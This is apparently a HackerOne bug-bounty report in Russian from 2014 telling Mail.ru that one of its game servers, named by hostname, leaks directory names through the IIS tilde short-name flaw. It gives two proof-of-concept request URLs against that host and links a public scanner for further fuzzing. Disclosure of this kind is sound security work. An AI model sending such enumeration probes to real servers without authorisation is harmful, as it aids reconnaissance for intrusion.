Mail.ru: Перечисление каталогов за счёт уязвимости в IIS

2014-06-08T18:52:41
ID H1:15652
Type hackerone
Reporter bigbear
Modified 2015-06-28T21:14:09

Description

Приветствую!

Сервер с багой : game1.bb.mail.ru

Можно попытаться перебирать каталоги за счёт уязвимости в IIS.

PoC

game1.bb.mail.ru/images/~1/a.aspx?aspxerrorpath=/ game1.bb.mail.ru/images/~2/a.aspx?aspxerrorpath=/

Можно запустить сканнер и пофаззить эту багу более конкретно

http://code.google.com/p/iis-shortname-scanner-poc/